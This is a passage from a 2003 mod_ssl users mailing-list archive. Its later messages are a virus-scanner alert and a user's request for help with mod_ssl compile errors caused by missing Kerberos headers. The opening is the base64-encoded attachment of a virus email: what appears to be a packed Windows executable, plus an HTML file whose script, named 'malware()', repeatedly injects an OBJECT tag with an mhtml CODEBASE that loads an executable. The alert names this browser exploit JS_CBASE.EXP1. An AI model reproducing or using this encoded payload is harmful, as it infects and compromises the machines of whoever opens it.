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
TEVBVVQzMi5ETEwAVVNFUjMyLkRMTAB3c29jazMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJv
Y0FkZHJlc3MAAEV4aXRQcm9jZXNzAAAAUmVnQ2xvc2VLZXkAAABleGl0AABHZXRTdG9ja09iamVj
dAAAR2V0TmV0d29ya1BhcmFtcwAAQ29Jbml0aWFsaXplAABTeXNBbGxvY1N0cmluZwAAU2V0VGlt
ZXIAAHJlY3YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAA
ACAAAAAAEAAAAFoAAABgAAAAegAAPGJvZHkgYmdjb2xvcj1ibGFjayBzY3JvbGw9bm8+CjxTQ1JJ
UFQ+CmZ1bmN0aW9uIG1hbHdhcmUoKQp7CnM9ZG9jdW1lbnQuVVJMO3BhdGg9cy5zdWJzdHIoLTAs
cy5sYXN0SW5kZXhPZigiXFwiKSk7CnBhdGg9dW5lc2NhcGUocGF0aCk7CmRvY3VtZW50LndyaXRl
KCcgPHRpdGxlPk1lc3NhZ2U8L3RpdGxlPjxib2R5IHNjcm9sbD1ubyBiZ2NvbG9yPXdoaXRlPjxG
T05UIGZhY2U9IkFyaWFsIiBjb2xvcj1ibGFjayBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9w
OjIwO2xlZnQ6OTA7ei1pbmRleDoxMDA7IGZvbnQtc2l6ZToxMnB4OyI+Tm8gbWVzc2FnZTwvY2Vu
dGVyPjxPQkpFQ1Qgc3R5bGU9ImN1cnNvcjpjcm9zcy1oYWlyIiBhbHQ9Im1vbyBoYSBoYSIgQ0xB
U1NJRD0iQ0xTSUQ6MTExMTExMTEtMTExMS0xMTExLTExMTEtMTExMTExMTExMTExIiAgQ09ERUJB
U0U9Im1odG1sOicrcGF0aCsnXFxtZXNzYWdlLmh0bWwhRmlsZTovL2Zvby5leGUiPjwvT0JKRUNU
PicpCn0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwxNTApCgo8L3NjcmlwdD48Ym9keSBiZ2NvbG9y
PWJsYWNrIHNjcm9sbD1ubz4KPFNDUklQVD4KZnVuY3Rpb24gbWFsd2FyZSgpCnsKcz1kb2N1bWVu
dC5VUkw7cGF0aD1zLnN1YnN0cigtMCxzLmxhc3RJbmRleE9mKCJcXCIpKTsKcGF0aD11bmVzY2Fw
ZShwYXRoKTsKZG9jdW1lbnQud3JpdGUoJyA8dGl0bGU+TWVzc2FnZTwvdGl0bGU+PGJvZHkgc2Ny
b2xsPW5vIGJnY29sb3I9d2hpdGU+PEZPTlQgZmFjZT0iQXJpYWwiIGNvbG9yPWJsYWNrIHN0eWxl
PSJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MjA7bGVmdDo5MDt6LWluZGV4OjEwMDsgZm9udC1zaXpl
OjEycHg7Ij5ObyBtZXNzYWdlPC9jZW50ZXI+PE9CSkVDVCBzdHlsZT0iY3Vyc29yOmNyb3NzLWhh
aXIiIGFsdD0ibW9vIGhhIGhhIiBDTEFTU0lEPSJDTFNJRDoxMTExMTExMS0xMTExLTExMTEtMTEx
MS0xMTExMTExMTExMTEiICBDT0RFQkFTRT0ibWh0bWw6JytwYXRoKydcXG1lc3NhZ2UuaHRtbCFG
aWxlOi8vZm9vLmV4ZSI+PC9PQkpFQ1Q+JykKfQpzZXRUaW1lb3V0KCJtYWx3YXJlKCkiLDE1MCkK
Cjwvc2NyaXB0Pjxib2R5IGJnY29sb3I9YmxhY2sgc2Nyb2xsPW5vPgo8U0NSSVBUPgpmdW5jdGlv
biBtYWx3YXJlKCkKewpzPWRvY3VtZW50LlVSTDtwYXRoPXMuc3Vic3RyKC0wLHMubGFzdEluZGV4
T2YoIlxcIikpOwpwYXRoPXVuZXNjYXBlKHBhdGgpOwpkb2N1bWVudC53cml0ZSgnIDx0aXRsZT5N
ZXNzYWdlPC90aXRsZT48Ym9keSBzY3JvbGw9bm8gYmdjb2xvcj13aGl0ZT48Rk9OVCBmYWNlPSJB
cmlhbCIgY29sb3I9YmxhY2sgc3R5bGU9InBvc2l0aW9uOmFic29sdXRlO3RvcDoyMDtsZWZ0Ojkw
O3otaW5kZXg6MTAwOyBmb250LXNpemU6MTJweDsiPk5vIG1lc3NhZ2U8L2NlbnRlcj48T0JKRUNU
IHN0eWxlPSJjdXJzb3I6Y3Jvc3MtaGFpciIgYWx0PSJtb28gaGEgaGEiIENMQVNTSUQ9IkNMU0lE
OjExMTExMTExLTExMTEtMTExMS0xMTExLTExMTExMTExMTExMSIgIENPREVCQVNFPSJtaHRtbDon
K3BhdGgrJ1xcbWVzc2FnZS5odG1sIUZpbGU6Ly9mb28uZXhlIj48L09CSkVDVD4nKQp9CnNldFRp
bWVvdXQoIm1hbHdhcmUoKSIsMTUwKQoKPC9zY3JpcHQ+PGJvZHkgYmdjb2xvcj1ibGFjayBzY3Jv
bGw9bm8+CjxTQ1JJUFQ+CmZ1bmN0aW9uIG1hbHdhcmUoKQp7CnM9ZG9jdW1lbnQuVVJMO3BhdGg9
cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7CnBhdGg9dW5lc2NhcGUocGF0aCk7CmRv
Y3VtZW50LndyaXRlKCcgPHRpdGxlPk1lc3NhZ2U8L3RpdGxlPjxib2R5IHNjcm9sbD1ubyBiZ2Nv
bG9yPXdoaXRlPjxGT05UIGZhY2U9IkFyaWFsIiBjb2xvcj1ibGFjayBzdHlsZT0icG9zaXRpb246
YWJzb2x1dGU7dG9wOjIwO2xlZnQ6OTA7ei1pbmRleDoxMDA7IGZvbnQtc2l6ZToxMnB4OyI+Tm8g
bWVzc2FnZTwvY2VudGVyPjxPQkpFQ1Qgc3R5bGU9ImN1cnNvcjpjcm9zcy1oYWlyIiBhbHQ9Im1v
byBoYSBoYSIgQ0xBU1NJRD0iQ0xTSUQ6MTExMTExMTEtMTExMS0xMTExLTExMTEtMTExMTExMTEx
MTExIiAgQ09ERUJBU0U9Im1odG1sOicrcGF0aCsnXFxtZXNzYWdlLmh0bWwhRmlsZTovL2Zvby5l
eGUiPjwvT0JKRUNUPicpCn0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwxNTApCgo8L3NjcmlwdD48
Ym9keSBiZ2NvbG9yPWJsYWNrIHNjcm9sbD1ubz4KPFNDUklQVD4KZnVuY3Rpb24gbWFsd2FyZSgp
CnsKcz1kb2N1bWVudC5VUkw7cGF0aD1zLnN1YnN0cigtMCxzLmxhc3RJbmRleE9mKCJcXCIpKTsK
cGF0aD11bmVzY2FwZShwYXRoKTsKZG9jdW1lbnQud3JpdGUoJyA8dGl0bGU+TWVzc2FnZTwvdGl0
bGU+PGJvZHkgc2Nyb2xsPW5vIGJnY29sb3I9d2hpdGU+PEZPTlQgZmFjZT0iQXJpYWwiIGNvbG9y
PWJsYWNrIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MjA7bGVmdDo5MDt6LWluZGV4OjEw
MDsgZm9udC1zaXplOjEycHg7Ij5ObyBtZXNzYWdlPC9jZW50ZXI+PE9CSkVDVCBzdHlsZT0iY3Vy
c29yOmNyb3NzLWhhaXIiIGFsdD0ibW9vIGhhIGhhIiBDTEFTU0lEPSJDTFNJRDoxMTExMTExMS0x
MTExLTExMTEtMTExMS0xMTExMTExMTExMTEiICBDT0RFQkFTRT0ibWh0bWw6JytwYXRoKydcXG1l
c3NhZ2UuaHRtbCFGaWxlOi8vZm9vLmV4ZSI+PC9PQkpFQ1Q+JykKfQpzZXRUaW1lb3V0KCJtYWx3
YXJlKCkiLDE1MCkKCjwvc2NyaXB0Pjxib2R5IGJnY29sb3I9YmxhY2sgc2Nyb2xsPW5vPgo8U0NS
SVBUPgpmdW5jdGlvbiBtYWx3YXJlKCkKewpzPWRvY3VtZW50LlVSTDtwYXRoPXMuc3Vic3RyKC0w
LHMubGFzdEluZGV4T2YoIlxcIikpOwpwYXRoPXVuZXNjYXBlKHBhdGgpOwpkb2N1bWVudC53cml0
ZSgnIDx0aXRsZT5NZXNzYWdlPC90aXRsZT48Ym9keSBzY3JvbGw9bm8gYmdjb2xvcj13aGl0ZT48
Rk9OVCBmYWNlPSJBcmlhbCIgY29sb3I9YmxhY2sgc3R5bGU9InBvc2l0aW9uOmFic29sdXRlO3Rv
cDoyMDtsZWZ0OjkwO3otaW5kZXg6MTAwOyBmb250LXNpemU6MTJweDsiPk5vIG1lc3NhZ2U8L2Nl
bnRlcj48T0JKRUNUIHN0eWxlPSJjdXJzb3I6Y3Jvc3MtaGFpciIgYWx0PSJtb28gaGEgaGEiIENM
QVNTSUQ9IkNMU0lEOjExMTExMTExLTExMTEtMTExMS0xMTExLTExMTExMTExMTExMSIgIENPREVC
QVNFPSJtaHRtbDonK3BhdGgrJ1xcbWVzc2FnZS5odG1sIUZpbGU6Ly9mb28uZXhlIj48L09CSkVD
VD4nKQp9CnNldFRpbWVvdXQoIm1hbHdhcmUoKSIsMTUwKQoKPC9zY3JpcHQ+PGJvZHkgYmdjb2xv
cj1ibGFjayBzY3JvbGw9bm8+CjxTQ1JJUFQ+CmZ1bmN0aW9uIG1hbHdhcmUoKQp7CnM9ZG9jdW1l
bnQuVVJMO3BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7CnBhdGg9dW5lc2Nh
cGUocGF0aCk7CmRvY3VtZW50LndyaXRlKCcgPHRpdGxlPk1lc3NhZ2U8L3RpdGxlPjxib2R5IHNj
cm9sbD1ubyBiZ2NvbG9yPXdoaXRlPjxGT05UIGZhY2U9IkFyaWFsIiBjb2xvcj1ibGFjayBzdHls
ZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjIwO2xlZnQ6OTA7ei1pbmRleDoxMDA7IGZvbnQtc2l6
ZToxMnB4OyI+Tm8gbWVzc2FnZTwvY2VudGVyPjxPQkpFQ1Qgc3R5bGU9ImN1cnNvcjpjcm9zcy1o
YWlyIiBhbHQ9Im1vbyBoYSBoYSIgQ0xBU1NJRD0iQ0xTSUQ6MTExMTExMTEtMTExMS0xMTExLTEx
MTEtMTExMTExMTExMTExIiAgQ09ERUJBU0U9Im1odG1sOicrcGF0aCsnXFxtZXNzYWdlLmh0bWwh
RmlsZTovL2Zvby5leGUiPjwvT0JKRUNUPicpCn0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwxNTAp
Cgo8L3NjcmlwdD48Ym9keSBiZ2NvbG9yPWJsYWNrIHNjcm9sbD1ubz4KPFNDUklQVD4KZnVuY3Rp
b24gbWFsd2FyZSgpCnsKcz1kb2N1bWVudC5VUkw7cGF0aD1zLnN1YnN0cigtMCxzLmxhc3RJbmRl
eE9mKCJcXCIpKTsKcGF0aD11bmVzY2FwZShwYXRoKTsKZG9jdW1lbnQud3JpdGUoJyA8dGl0bGU+
TWVzc2FnZTwvdGl0bGU+PGJvZHkgc2Nyb2xsPW5vIGJnY29sb3I9d2hpdGU+PEZPTlQgZmFjZT0i
QXJpYWwiIGNvbG9yPWJsYWNrIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTt0b3A6MjA7bGVmdDo5
MDt6LWluZGV4OjEwMDsgZm9udC1zaXplOjEycHg7Ij5ObyBtZXNzYWdlPC9jZW50ZXI+PE9CSkVD
VCBzdHlsZT0iY3Vyc29yOmNyb3NzLWhhaXIiIGFsdD0ibW9vIGhhIGhhIiBDTEFTU0lEPSJDTFNJ
RDoxMTExMTExMS0xMTExLTExMTEtMTExMS0xMTExMTExMTExMTEiICBDT0RFQkFTRT0ibWh0bWw6
JytwYXRoKydcXG1lc3NhZ2UuaHRtbCFGaWxlOi8vZm9vLmV4ZSI+PC9PQkpFQ1Q+JykKfQpzZXRU
aW1lb3V0KCJtYWx3YXJlKCkiLDE1MCkKCjwvc2NyaXB0Pjxib2R5IGJnY29sb3I9YmxhY2sgc2Ny
b2xsPW5vPgo8U0NSSVBUPgpmdW5jdGlvbiBtYWx3YXJlKCkKewpzPWRvY3VtZW50LlVSTDtwYXRo
PXMuc3Vic3RyKC0wLHMubGFzdEluZGV4T2YoIlxcIikpOwpwYXRoPXVuZXNjYXBlKHBhdGgpOwpk
b2N1bWVudC53cml0ZSgnIDx0aXRsZT5NZXNzYWdlPC90aXRsZT48Ym9keSBzY3JvbGw9bm8gYmdj
b2xvcj13aGl0ZT48Rk9OVCBmYWNlPSJBcmlhbCIgY29sb3I9YmxhY2sgc3R5bGU9InBvc2l0aW9u
OmFic29sdXRlO3RvcDoyMDtsZWZ0OjkwO3otaW5kZXg6MTAwOyBmb250LXNpemU6MTJweDsiPk5v
IG1lc3NhZ2U8L2NlbnRlcj48T0JKRUNUIHN0eWxlPSJjdXJzb3I6Y3Jvc3MtaGFpciIgYWx0PSJt
b28gaGEgaGEiIENMQVNTSUQ9IkNMU0lEOjExMTExMTExLTExMTEtMTExMS0xMTExLTExMTExMTEx
MTExMSIgIENPREVCQVNFPSJtaHRtbDonK3BhdGgrJ1xcbWVzc2FnZS5odG1sIUZpbGU6Ly9mb28u
ZXhlIj48L09CSkVDVD4nKQp9CnNldFRpbWVvdXQoIm1hbHdhcmUoKSIsMTUwKQoKPC9zY3JpcHQ+
PGJvZHkgYmdjb2xvcj1ibGFjayBzY3JvbGw9bm8+CjxTQ1JJUFQ+CmZ1bmN0aW9uIG1hbHdhcmUo
KQp7CnM9ZG9jdW1lbnQuVVJMO3BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7
CnBhdGg9dW5lc2NhcGUocGF0aCk7CmRvY3VtZW50LndyaXRlKCcgPHRpdGxlPk1lc3NhZ2U8L3Rp
dGxlPjxib2R5IHNjcm9sbD1ubyBiZ2NvbG9yPXdoaXRlPjxGT05UIGZhY2U9IkFyaWFsIiBjb2xv
cj1ibGFjayBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjIwO2xlZnQ6OTA7ei1pbmRleDox
MDA7IGZvbnQtc2l6ZToxMnB4OyI+Tm8gbWVzc2FnZTwvY2VudGVyPjxPQkpFQ1Qgc3R5bGU9ImN1
cnNvcjpjcm9zcy1oYWlyIiBhbHQ9Im1vbyBoYSBoYSIgQ0xBU1NJRD0iQ0xTSUQ6MTExMTExMTEt
MTExMS0xMTExLTExMTEtMTExMTExMTExMTExIiAgQ09ERUJBU0U9Im1odG1sOicrcGF0aCsnXFxt
ZXNzYWdlLmh0bWwhRmlsZTovL2Zvby5leGUiPjwvT0JKRUNUPicpCn0Kc2V0VGltZW91dCgibWFs
d2FyZSgpIiwxNTApCgo8L3NjcmlwdD48Ym9keSBiZ2NvbG9yPWJsYWNrIHNjcm9sbD1ubz4KPFND
UklQVD4KZnVuY3Rpb24gbWFsd2FyZSgpCnsKcz1kb2N1bWVudC5VUkw7cGF0aD1zLnN1YnN0cigt
MCxzLmxhc3RJbmRleE9mKCJcXCIpKTsKcGF0aD11bmVzY2FwZShwYXRoKTsKZG9jdW1lbnQud3Jp
dGUoJyA8dGl0bGU+TWVzc2FnZTwvdGl0bGU+PGJvZHkgc2Nyb2xsPW5vIGJnY29sb3I9d2hpdGU+
PEZPTlQgZmFjZT0iQXJpYWwiIGNvbG9yPWJsYWNrIHN0eWxlPSJwb3NpdGlvbjphYnNvbHV0ZTt0
b3A6MjA7bGVmdDo5MDt6LWluZGV4OjEwMDsgZm9udC1zaXplOjEycHg7Ij5ObyBtZXNzYWdlPC9j
ZW50ZXI+PE9CSkVDVCBzdHlsZT0iY3Vyc29yOmNyb3NzLWhhaXIiIGFsdD0ibW9vIGhhIGhhIiBD
TEFTU0lEPSJDTFNJRDoxMTExMTExMS0xMTExLTExMTEtMTExMS0xMTExMTExMTExMTEiICBDT0RF
QkFTRT0ibWh0bWw6JytwYXRoKydcXG1lc3NhZ2UuaHRtbCFGaWxlOi8vZm9vLmV4ZSI+PC9PQkpF
Q1Q+JykKfQpzZXRUaW1lb3V0KCJtYWx3YXJlKCkiLDE1MCkKCjwvc2NyaXB0PlBLAQIUAAoAAAAA
AKVcGi9C98lKfUcAAH1HAAAMAAAAAAAAAAAAIAAAAAAAAABtZXNzYWdlLmh0bWxQSwUGAAAAAAEA
AQA6AAAAp0cAAAAA

------------30534EDB0007F58--


From MAILER-DAEMON  Tue Aug 26 13:46:14 2003
Return-Path: <>
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from charizard.ncipherusa.com (mail.ncipherusa.com [65.213.83.227])
	by master.modssl.org (Postfix) with ESMTP id A5604A8988
	for ; Tue, 26 Aug 2003 13:44:50 +0200 (CEST)
Received: from acesrv.ncipherusa.com ([172.24.8.6] helo=acesrv)
	by charizard.ncipherusa.com with smtp (Exim 3.36 #1)
	id 19rcFl-0008c9-00
	for modssl-users-l@master.modssl.org; Tue, 26 Aug 2003 07:44:49 -0400
Date: Tue, 26 Aug 2003 07:44:36 -0400
From: postmaster@us.ncipher.com
To: modssl-users-l@master.modssl.org
Subject: InterScan NT Alert
Message-Id: 

Receiver, InterScan has detected virus(es) in the e-mail attachment.

Date:  	Tue, 26 Aug 2003 07:44:36 -0400
Method:	Mail
From:  	
To:    	
File:  	message.zip
Action:	clean failed - deleted
Virus: 	JS_CBASE.EXP1 

From owner-modssl-users@modssl.org  Tue Aug 26 21:50:50 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C44C8A8966; Tue, 26 Aug 2003 21:50:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by master.modssl.org (Postfix) with ESMTP id BB70BA8933
	for ; Tue, 26 Aug 2003 21:49:25 +0200 (CEST)
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by hailix.com (8.12.9/8.12.9) with ESMTP id h7QJnNpP007715
	for ; Tue, 26 Aug 2003 13:49:23 -0600
Message-ID: <3F4BB9C3.2000109@hailix.com>
Date: Tue, 26 Aug 2003 13:49:23 -0600
From: Trevor Morrison 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: [Fwd: mod_ssl compile problems]
Content-Type: multipart/mixed;
 boundary="------------040401070502050106000908"
X-Scanned-By: MIMEDefang 2.36
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Trevor Morrison 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------040401070502050106000908
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit



--------------040401070502050106000908
Content-Type: message/rfc822;
 name="mod_ssl compile problems"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="mod_ssl compile problems"

X-Mozilla-Status2: 00800000
Message-ID: <3F442B44.7070707@hailix.com>
Disposition-Notification-To: Trevor Morrison 
Date: Wed, 20 Aug 2003 20:15:32 -0600
From: Trevor Morrison 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: mod_ssl compile problems
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi,

I am trying to compile in mod_ssl 2.8.15 into the apache1.3.28 source 
and using openssl-1.9.7a-2 installed from an RH RPM and I am getting the 
following error:

ranlib libstandard.a
<=== src/modules/standard
===> src/modules/ssl
gcc -c -I../.. -I/usr/lib/perl5/5.8.0/i386-linux-thread-multi/CORE 
-I../../os/unix -I../../include   -DLINUX=22 -DMOD_SSL=208115 -DMOD_PERL 
-DUSE_PERL_SSI -D_REENTRANT  -DTHREADS_HAVE_PIDS -DDEBUGGING 
-fno-strict-aliasing -I/usr/local/include -D_LARGEFILE_SOURCE 
-D_FILE_OFFSET_BITS=64 -I/usr/include/gdbm -DUSE_HSREGEX
-DEAPI -DEAPI_MM -DNO_DL_NEEDED `../../apaci` -DSSL_USE_SDBM 
-DSSL_ENGINE -DMOD_SSL_VERSION=\"2.8.15\" mod_ssl.c
In file included from /usr/include/openssl/ssl.h:179,
                 from mod_ssl.h:116,
                 from mod_ssl.c:65:
/usr/include/openssl/kssl.h:72:18: krb5.h: No such file or directory
In file included from /usr/include/openssl/ssl.h:179,
                 from mod_ssl.h:116,
                 from mod_ssl.c:65:
/usr/include/openssl/kssl.h:132: parse error before "krb5_enctype"
/usr/include/openssl/kssl.h:134: parse error before "FAR"
/usr/include/openssl/kssl.h:135: parse error before '}' token
/usr/include/openssl/kssl.h:147: parse error before "kssl_ctx_setstring"
/usr/include/openssl/kssl.h:147: parse error before '*' token
/usr/include/openssl/kssl.h:148: parse error before '*' token
/usr/include/openssl/kssl.h:149: parse error before '*' token
/usr/include/openssl/kssl.h:149: parse error before '*' token
/usr/include/openssl/kssl.h:150: parse error before '*' token
/usr/include/openssl/kssl.h:151: parse error before "kssl_ctx_setprinc"
/usr/include/openssl/kssl.h:151: parse error before '*' token
/usr/include/openssl/kssl.h:153: parse error before "kssl_cget_tkt"
/usr/include/openssl/kssl.h:153: parse error before '*' token
/usr/include/openssl/kssl.h:155: parse error before "kssl_sget_tkt"
/usr/include/openssl/kssl.h:155: parse error before '*' token
/usr/include/openssl/kssl.h:157: parse error before "kssl_ctx_setkey"
/usr/include/openssl/kssl.h:157: parse error before '*' token
/usr/include/openssl/kssl.h:159: parse error before "context"
/usr/include/openssl/kssl.h:160: parse error before "kssl_build_principal_2"
/usr/include/openssl/kssl.h:160: parse error before "context"
/usr/include/openssl/kssl.h:163: parse error before "kssl_validate_times"
/usr/include/openssl/kssl.h:163: parse error before "atime"
/usr/include/openssl/kssl.h:165: parse error before "kssl_check_authent"
/usr/include/openssl/kssl.h:165: parse error before '*' token
/usr/include/openssl/kssl.h:167: parse error before "enctype"
In file included from mod_ssl.h:116,
                 from mod_ssl.c:65:
/usr/include/openssl/ssl.h:909: parse error before "KSSL_CTX"
/usr/include/openssl/ssl.h:931: parse error before '}' token
make[4]: *** [mod_ssl.o] Error 1
make[3]: *** [all] Error 1
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/var/tmp/apache_1.3.28/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/var/tmp/apache_1.3.28'
make: *** [build] Error 2

I am on a RH 9 box with a 2.4.20 compiled static kernle.

TIA

Trevor


--------------040401070502050106000908--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 26 22:23:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68211A8934; Tue, 26 Aug 2003 22:23:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by master.modssl.org (Postfix) with ESMTP id 4B56FA8938
	for ; Tue, 26 Aug 2003 22:21:48 +0200 (CEST)
Received: from hailix.com (12-208-247-87.client.attbi.com [12.208.247.87])
	by hailix.com (8.12.9/8.12.9) with ESMTP id h7QKLjpP022928;
	Tue, 26 Aug 2003 14:21:45 -0600
Message-ID: <3F4BC159.9050606@hailix.com>
Date: Tue, 26 Aug 2003 14:21:45 -0600
From: Trevor Morrison 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
